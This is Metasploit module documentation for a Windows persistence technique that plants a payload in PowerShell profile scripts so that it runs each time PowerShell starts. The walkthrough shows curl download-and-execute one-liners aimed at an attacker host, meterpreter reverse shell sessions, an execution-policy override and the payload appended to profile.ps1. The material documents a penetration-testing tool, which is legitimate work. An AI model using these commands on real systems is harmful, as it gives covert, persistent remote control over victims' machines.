adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
metasploit-gs/documentation/modules/exploit/windows/persistence/powershell_profile.md
T
madefourit 05914feb4d module docs and description_formatted
2026-04-14 09:45:45 -04:00

130 lines
5.2 KiB
Markdown
Raw Permalink Blame History

## Vulnerable Application
This module establishes persistence by modifying a PowerShell profile script, which is automatically
executed when PowerShell starts. The module supports multiple profile scopes (current user or all users)
and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.
## Verification Steps
1. Start msfconsole
2. Get a shell on Windows
3. Do: `use exploit/windows/persistence/powershell_profile`
4. Do: `set payload [payload]`
5. Do: `set session #`
6. Do: `run`
7. You should get a shell when powershell is opened on the target machine.
## Options
### PROFILE
The powershell profile to target. Choices are `AUTO`, `ALLUSERSALLHOSTS`, `ALLUSERSCURRENTHOST`, `CURRENTUSERALLHOSTS`, `CURRENTUSERCURRENTHOST`.
Defaults to `AUTO`
### CREATE
If a profile file doesnt exist, create one. Defaults to `false`
### EXECUTIONPOLICY
Attempt to update execution policy to execute. Defaults to `true`
## Scenarios
### Windows 10 1909 (10.0 Build 18363)
Initial shell
```
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/NB_U4Lr2Ty2xrjYqvzRVEg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /NB_U4Lr2Ty2xrjYqvzRVEg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Client 2.2.2.2 requested /NB_U4Lr2Ty2xrjYqvzRVEg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55201) at 2026-02-04 17:06:23 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...
```
Install Persistence
```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/powershell_profile
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/powershell_profile) > set create true
create => true
msf exploit(windows/persistence/powershell_profile) > set EXECUTIONPOLICY true
EXECUTIONPOLICY => true
msf exploit(windows/persistence/powershell_profile) > set session 1
session => 1
msf exploit(windows/persistence/powershell_profile) > rexploit
[*] Reloading module...
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/powershell_profile) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Powershell execution policy for CurrentUser (Undefined), will attempt to override
[*] Updating Powershell execution policy for CurrentUser to RemoteSigned
[*] C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 does not exist, creating it...
[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
[*] C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 does not exist, creating it...
[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
[*] C:\Users\windows\Documents\WindowsPowerShell\profile.ps1 does not exist, creating it...
[*] Powershell command length: 4193
[*] Appending payload to C:\Users\windows\Documents\WindowsPowerShell\profile.ps1
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260204.1237/WIN10PROLICENSE_20260204.1237.rc
```
Start powershell on the target computer
```
[*] Sending stage (190534 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:55207) at 2026-02-04 17:13:02 -0500
```
Reference in New Issue View Git Blame Copy Permalink